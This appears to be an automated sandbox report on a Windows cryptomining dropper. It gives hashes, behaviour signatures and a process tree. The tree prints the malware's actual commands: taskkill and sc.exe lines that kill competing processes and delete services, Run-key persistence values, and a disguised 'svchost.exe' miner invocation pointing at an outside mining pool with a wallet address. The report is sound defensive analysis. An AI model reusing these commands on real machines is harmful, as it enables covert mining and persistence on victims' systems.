Analysis
-
max time kernel
154s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2022 12:54
Static task
static1
Behavioral task
behavioral1
Sample
de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe
Resource
win10v2004-20220812-en
General
-
Target
de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe
-
Size
4.4MB
-
MD5
bebf99d452c84ae6942edb67981dfe7b
-
SHA1
706ccf3e9fd16462d26b7feb3aaaa9075d416765
-
SHA256
de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83
-
SHA512
60da4ccbf63887aa18f576207fcea79a5dedca11afb4a38a0958a3e7fe976d142761f123cd2ffd9bd7177a9c68b2dc85b2044ecb6ddde638e8a535cb851dd9da
-
SSDEEP
98304:oP8ReGIO335AWrRNoZgo7gnqlNMIHf9k0LNm4ykaJQmJGChdT+r:6MeG335AWVNug6gn6NVm0xEXJQmJhd
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
Processes:
netapiservice.exesvchost.exepid process 4680 netapiservice.exe 2544 svchost.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\svchost.exe vmprotect C:\Users\Admin\AppData\Local\Temp\svchost.exe vmprotect C:\Users\Admin\AppData\Local\Temp\libcurl.dll vmprotect C:\Users\Admin\AppData\Local\Temp\libcurl.dll vmprotect behavioral2/memory/2544-163-0x0000000180000000-0x00000001800C7000-memory.dmp vmprotect behavioral2/memory/2544-164-0x00007FF7F3A50000-0x00007FF7F3C90000-memory.dmp vmprotect behavioral2/memory/2544-166-0x00007FF7F3A50000-0x00007FF7F3C90000-memory.dmp vmprotect behavioral2/memory/2544-169-0x00007FF7F3A50000-0x00007FF7F3C90000-memory.dmp vmprotect behavioral2/memory/2544-170-0x0000000180000000-0x00000001800C7000-memory.dmp vmprotect -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exenetapiservice.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation netapiservice.exe -
Loads dropped DLL 3 IoCs
Processes:
svchost.exepid process 2544 svchost.exe 2544 svchost.exe 2544 svchost.exe -
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exenetapiservice.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Microsoft Windows NetAPI Service = "C:\\Users\\Admin\\AppData\\Roaming\\NetAPIService\\netapiservice.exe" de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce netapiservice.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Microsoft Windows NetAPI Service = "C:\\Users\\Admin\\AppData\\Roaming\\NetAPIService\\netapiservice.exe" netapiservice.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\Run de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Windows NetAPI Service = "C:\\Users\\Admin\\AppData\\Roaming\\NetAPIService\\netapiservice.exe" de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
svchost.exepid process 2544 svchost.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 3612 sc.exe 4220 sc.exe 1524 sc.exe 1268 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 9 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 3204 taskkill.exe 4676 taskkill.exe 4780 taskkill.exe 3964 taskkill.exe 444 taskkill.exe 4420 taskkill.exe 2928 taskkill.exe 1784 taskkill.exe 744 taskkill.exe -
Modifies registry class 2 IoCs
Processes:
de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exenetapiservice.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ netapiservice.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exenetapiservice.exepid process 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe 4680 netapiservice.exe 4680 netapiservice.exe -
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exesvchost.exedescription pid process Token: SeDebugPrivilege 4676 taskkill.exe Token: SeDebugPrivilege 4780 taskkill.exe Token: SeDebugPrivilege 2928 taskkill.exe Token: SeDebugPrivilege 4420 taskkill.exe Token: SeDebugPrivilege 3204 taskkill.exe Token: SeDebugPrivilege 1784 taskkill.exe Token: SeDebugPrivilege 3964 taskkill.exe Token: SeDebugPrivilege 444 taskkill.exe Token: SeDebugPrivilege 744 taskkill.exe Token: SeLockMemoryPrivilege 2544 svchost.exe -
Suspicious use of WriteProcessMemory 44 IoCs
Processes:
de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exenetapiservice.exedescription pid process target process PID 5104 wrote to memory of 3204 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe taskkill.exe PID 5104 wrote to memory of 3204 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe taskkill.exe PID 5104 wrote to memory of 3204 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe taskkill.exe PID 5104 wrote to memory of 4676 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe taskkill.exe PID 5104 wrote to memory of 4676 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe taskkill.exe PID 5104 wrote to memory of 4676 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe taskkill.exe PID 5104 wrote to memory of 4420 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe taskkill.exe PID 5104 wrote to memory of 4420 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe taskkill.exe PID 5104 wrote to memory of 4420 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe taskkill.exe PID 5104 wrote to memory of 4780 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe taskkill.exe PID 5104 wrote to memory of 4780 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe taskkill.exe PID 5104 wrote to memory of 4780 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe taskkill.exe PID 5104 wrote to memory of 1268 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe sc.exe PID 5104 wrote to memory of 1268 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe sc.exe PID 5104 wrote to memory of 1268 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe sc.exe PID 5104 wrote to memory of 3612 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe sc.exe PID 5104 wrote to memory of 3612 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe sc.exe PID 5104 wrote to memory of 3612 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe sc.exe PID 5104 wrote to memory of 4220 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe sc.exe PID 5104 wrote to memory of 4220 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe sc.exe PID 5104 wrote to memory of 4220 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe sc.exe PID 5104 wrote to memory of 1524 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe sc.exe PID 5104 wrote to memory of 1524 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe sc.exe PID 5104 wrote to memory of 1524 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe sc.exe PID 5104 wrote to memory of 2928 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe taskkill.exe PID 5104 wrote to memory of 2928 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe taskkill.exe PID 5104 wrote to memory of 2928 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe taskkill.exe PID 5104 wrote to memory of 4680 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe netapiservice.exe PID 5104 wrote to memory of 4680 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe netapiservice.exe PID 5104 wrote to memory of 4680 5104 de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe netapiservice.exe PID 4680 wrote to memory of 1784 4680 netapiservice.exe taskkill.exe PID 4680 wrote to memory of 1784 4680 netapiservice.exe taskkill.exe PID 4680 wrote to memory of 1784 4680 netapiservice.exe taskkill.exe PID 4680 wrote to memory of 3964 4680 netapiservice.exe taskkill.exe PID 4680 wrote to memory of 3964 4680 netapiservice.exe taskkill.exe PID 4680 wrote to memory of 3964 4680 netapiservice.exe taskkill.exe PID 4680 wrote to memory of 444 4680 netapiservice.exe taskkill.exe PID 4680 wrote to memory of 444 4680 netapiservice.exe taskkill.exe PID 4680 wrote to memory of 444 4680 netapiservice.exe taskkill.exe PID 4680 wrote to memory of 744 4680 netapiservice.exe taskkill.exe PID 4680 wrote to memory of 744 4680 netapiservice.exe taskkill.exe PID 4680 wrote to memory of 744 4680 netapiservice.exe taskkill.exe PID 4680 wrote to memory of 2544 4680 netapiservice.exe svchost.exe PID 4680 wrote to memory of 2544 4680 netapiservice.exe svchost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe"C:\Users\Admin\AppData\Local\Temp\de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe"1⤵
- Checks computer location settings
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5104 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im CheckServer.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3204 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im cmd.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4676 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im WerFault.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4420 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im exceptionfilter.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4780 -
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" stop "Windows Ssyncer"2⤵
- Launches sc.exe
PID:1268 -
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" stop "Windows ssyncer agent"2⤵
- Launches sc.exe
PID:3612 -
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" delete "Windows Ssyncer"2⤵
- Launches sc.exe
PID:4220 -
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" delete "Windows ssyncer agent"2⤵
- Launches sc.exe
PID:1524 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im ssyncer.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2928 -
C:\Users\Admin\AppData\Roaming\NetAPIService\netapiservice.exe"C:\Users\Admin\AppData\Roaming\NetAPIService\netapiservice.exe" C:\Users\Admin\AppData\Local\Temp\de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83.exe2⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4680 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im CheckServer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1784 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im cmd.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3964 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im WerFault.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:444 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\System32\taskkill.exe" /f /im exceptionfilter.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:744 -
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe" -a cryptonight -o stratum+tcp://xmr.farm:3333 -u 45VGQ59BKuqRnUWaGzw5r17xhgnzPteTXAXqfDLnPswLEjGS3xi9MxZb1MCV2sAyj9MZ3v1tohdLa34hZVvzmkn3EYJAaVE -p x -t 23⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2544
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
809KB
MD5366fd6f3a451351b5df2d7c4ecf4c73a
SHA150db750522b9630757f91b53df377fd4ed4e2d66
SHA256ae3cb6c6afba9a4aa5c85f66023c35338ca579b30326dd02918f9d55259503d5
SHA5122de764772b68a85204b7435c87e9409d753c2196cf5b2f46e7796c99a33943e167f62a92e8753eaa184cd81fb14361e83228eb1b474e0c3349ed387ec93e6130
-
Filesize
355KB
MD50ed8d06706e2a9a8fc17ea5b775b3507
SHA1752a72953fc2eacc1fe8d054f585169530bb826e
SHA2566eedb93c55a2c541963b6e2df4dd92e7578833a4cf5d65501fa9d15530e3b1c3
SHA512ac5c467993f71ce0cc7bbbcba48a91c0369bac9dac64d1fc34969ec82791ee9b2707359176c0563c70d080a57c308b784a15989196aec593741cced085af39a3
-
Filesize
355KB
MD50ed8d06706e2a9a8fc17ea5b775b3507
SHA1752a72953fc2eacc1fe8d054f585169530bb826e
SHA2566eedb93c55a2c541963b6e2df4dd92e7578833a4cf5d65501fa9d15530e3b1c3
SHA512ac5c467993f71ce0cc7bbbcba48a91c0369bac9dac64d1fc34969ec82791ee9b2707359176c0563c70d080a57c308b784a15989196aec593741cced085af39a3
-
Filesize
809KB
MD5366fd6f3a451351b5df2d7c4ecf4c73a
SHA150db750522b9630757f91b53df377fd4ed4e2d66
SHA256ae3cb6c6afba9a4aa5c85f66023c35338ca579b30326dd02918f9d55259503d5
SHA5122de764772b68a85204b7435c87e9409d753c2196cf5b2f46e7796c99a33943e167f62a92e8753eaa184cd81fb14361e83228eb1b474e0c3349ed387ec93e6130
-
Filesize
81KB
MD54a502706d149c2f5854131a7758a90e2
SHA1845842f909769a673138553748ad09e609ec3e17
SHA2560e6af724609ef6846982ef717013426c359c455fff324e906d8d55c8bb88d16e
SHA5121cdc7d92dfee299850fe8703509e3cf33470470d239b27ca9d5760d3fd01775c3512b80e4b9bdca9f782c2193be0c0a554c1bb37c1a99e435e96e14902386161
-
Filesize
81KB
MD54a502706d149c2f5854131a7758a90e2
SHA1845842f909769a673138553748ad09e609ec3e17
SHA2560e6af724609ef6846982ef717013426c359c455fff324e906d8d55c8bb88d16e
SHA5121cdc7d92dfee299850fe8703509e3cf33470470d239b27ca9d5760d3fd01775c3512b80e4b9bdca9f782c2193be0c0a554c1bb37c1a99e435e96e14902386161
-
Filesize
1.1MB
MD5791f352c9aa2bbc0c711b595eea44c98
SHA13faa9e490977ce053609f2656b7a8bf75f8c6515
SHA256b9bf3113408d8b671ac4e436f21da35e02dcd557863e0aa2621dc2b36a582efd
SHA5127258c03bae125876afcf4e41f5047bbb29062e84eb1d263dfff1cb9146a637fb48a9e873d72de326c653b2f59f0ef6c84853e8fae8033baad452927604ae44d3
-
Filesize
1.1MB
MD5791f352c9aa2bbc0c711b595eea44c98
SHA13faa9e490977ce053609f2656b7a8bf75f8c6515
SHA256b9bf3113408d8b671ac4e436f21da35e02dcd557863e0aa2621dc2b36a582efd
SHA5127258c03bae125876afcf4e41f5047bbb29062e84eb1d263dfff1cb9146a637fb48a9e873d72de326c653b2f59f0ef6c84853e8fae8033baad452927604ae44d3
-
Filesize
4.4MB
MD5bebf99d452c84ae6942edb67981dfe7b
SHA1706ccf3e9fd16462d26b7feb3aaaa9075d416765
SHA256de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83
SHA51260da4ccbf63887aa18f576207fcea79a5dedca11afb4a38a0958a3e7fe976d142761f123cd2ffd9bd7177a9c68b2dc85b2044ecb6ddde638e8a535cb851dd9da
-
Filesize
4.4MB
MD5bebf99d452c84ae6942edb67981dfe7b
SHA1706ccf3e9fd16462d26b7feb3aaaa9075d416765
SHA256de96d8ecfd0539bfc19a9d721a0f520283efa91e4969751141b770990e79ab83
SHA51260da4ccbf63887aa18f576207fcea79a5dedca11afb4a38a0958a3e7fe976d142761f123cd2ffd9bd7177a9c68b2dc85b2044ecb6ddde638e8a535cb851dd9da